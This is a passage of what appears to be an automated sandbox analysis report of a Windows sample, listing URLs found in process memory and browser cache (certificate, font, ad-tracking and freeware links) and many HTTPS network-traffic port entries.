          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?Download=Find.Same.Images.OK
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.surfok.de/
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
          Source: chromecache_313.1.dr, chromecache_192.1.drString found in binary or memory: http://www.thecssninja.com/javascript/handleevent
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
          Source: chromecache_212.1.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
          Source: chromecache_279.1.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
          Source: chromecache_247.1.dr, chromecache_207.1.dr, chromecache_212.1.drString found in binary or memory: https://cct.google/taggy/agent.js
          Source: chromecache_326.1.drString found in binary or memory: https://connect.facebook.net/
          Source: chromecache_326.1.drString found in binary or memory: https://connect.facebook.net/log/fbevents_telemetry/
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: https://d.symcb.com/cps0%
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: https://d.symcb.com/rpa0
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: https://d.symcb.com/rpa0.
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LIftL.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LJftLp_A.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LLPtLp_A.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LL_tLp_A.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LLvtLp_A.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LT_tLp_A.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LXftLp_A.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuM2T7I-NP.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuM3b7I-NP.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuMw77I-NP.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuMwT7I-NP.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuMwX7I-NP.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuMwf7I-NP.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuMwr7Iw.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/raleway/v34/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCFPrEHJA.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/raleway/v34/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCGPrEHJA.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/raleway/v34/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCHPrEHJA.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/raleway/v34/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCIPrE.woff2)
          Source: chromecache_205.1.drString found in binary or memory: https://fonts.gstatic.com/s/raleway/v34/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCMPrEHJA.woff2)
          Source: chromecache_281.1.drString found in binary or memory: https://github.com/carhartl/jquery-cookie
          Source: chromecache_313.1.dr, chromecache_192.1.drString found in binary or memory: https://github.com/viljamis/responsive-nav.js
          Source: chromecache_212.1.drString found in binary or memory: https://google.com
          Source: chromecache_212.1.drString found in binary or memory: https://googleads.g.doubleclick.net
          Source: chromecache_212.1.drString found in binary or memory: https://pagead2.googlesyndication.com
          Source: chromecache_247.1.dr, chromecache_207.1.dr, chromecache_212.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
          Source: chromecache_242.1.dr, chromecache_246.1.drString found in binary or memory: https://premiumserviceads.com/yJuiD
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: https://sectigo.com/CPS0
          Source: chromecache_207.1.drString found in binary or memory: https://static.ads-twitter.com/uwt.js
          Source: chromecache_279.1.drString found in binary or memory: https://stats.g.doubleclick.net/j/collect
          Source: chromecache_279.1.drString found in binary or memory: https://tagassistant.google.com/
          Source: chromecache_247.1.dr, chromecache_207.1.dr, chromecache_212.1.drString found in binary or memory: https://td.doubleclick.net
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
          Source: chromecache_207.1.drString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: chromecache_279.1.drString found in binary or memory: https://www.google-analytics.com/debug/bootstrap?id=
          Source: chromecache_279.1.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=
          Source: chromecache_279.1.drString found in binary or memory: https://www.google.%/ads/ga-audiences
          Source: chromecache_212.1.drString found in binary or memory: https://www.google.com
          Source: chromecache_279.1.drString found in binary or memory: https://www.google.com/ads/ga-audiences
          Source: chromecache_198.1.dr, chromecache_224.1.dr, chromecache_265.1.dr, chromecache_255.1.dr, chromecache_257.1.dr, chromecache_199.1.dr, chromecache_217.1.dr, chromecache_197.1.dr, chromecache_303.1.dr, chromecache_344.1.dr, chromecache_296.1.drString found in binary or memory: https://www.google.com/pagead/1p-user-list/1072733940/?random
          Source: chromecache_212.1.drString found in binary or memory: https://www.googleadservices.com
          Source: chromecache_212.1.drString found in binary or memory: https://www.googletagmanager.com
          Source: chromecache_247.1.dr, chromecache_212.1.drString found in binary or memory: https://www.googletagmanager.com/a?
          Source: chromecache_279.1.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
          Source: chromecache_247.1.dr, chromecache_212.1.drString found in binary or memory: https://www.googletagmanager.com/static/service_worker/
          Source: chromecache_207.1.drString found in binary or memory: https://www.redditstatic.com/ads/pixel.js
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
          Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
          Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
